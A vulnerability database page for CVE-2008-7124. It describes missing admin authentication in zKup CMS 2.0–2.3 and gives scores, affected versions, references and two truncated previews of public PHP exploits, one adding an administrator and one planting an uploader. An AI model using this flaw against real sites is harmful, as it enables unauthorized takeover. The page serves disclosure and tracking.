Published: 31/08/2009 Updated: 29/09/2017

CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10

VMScore: 760

Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

zKup CMS 2.0 up to and including 2.3 does not require administrative authentication for admin/configuration/modifier.php, which allows remote malicious users to gain administrator privileges via a direct request, as demonstrated by adding a new administrator.

Vulnerable Product	Search on Vulmon	Subscribe to Product
zkup zkup 2.03
zkup zkup 2.01
zkup zkup 2.02
zkup zkup 2.0

#!/usr/bin/php <?php /* * Name: zKup CMS v20 <= v23 0-day exploit (add admin) * Credits: Charles "real" F <charlesfol[at]hotmailfr> * Date: 03-08-2008 * Conditions: None * * This exploit add a new zKup admin * */ print "\n"; print " zKup CMS v20 <= v23 0-day exploit (add admin)\n"; print " by Charles \" ...

#!/usr/bin/php <?php /* * Name: zKup CMS v20 <= v23 0-day exploit (upload) * Credits: Charles "real" F <charlesfol[at]hotmailfr> * Date: 03-08-2008 * Conditions: PHP Version, magic_quotes_gpc=Off * * This exploit spawn a php uploader in your victim's * server * * Okay, you may need explanations: * * First, we can u ...

CWE-287 http://secunia.com/advisories/29276 http://www.securityfocus.com/bid/28149 http://osvdb.org/43081 http://www.zkup.fr/actualite-zkup/maj-critique-v203v204.html https://exchange.xforce.ibmcloud.com/vulnerabilities/41068 https://www.exploit-db.com/exploits/5220 https://www.exploit-db.com/exploits/5219 https://nvd.nist.gov https://www.exploit-db.com/exploits/5219/

Get Started

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

CVE-2008-7124

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect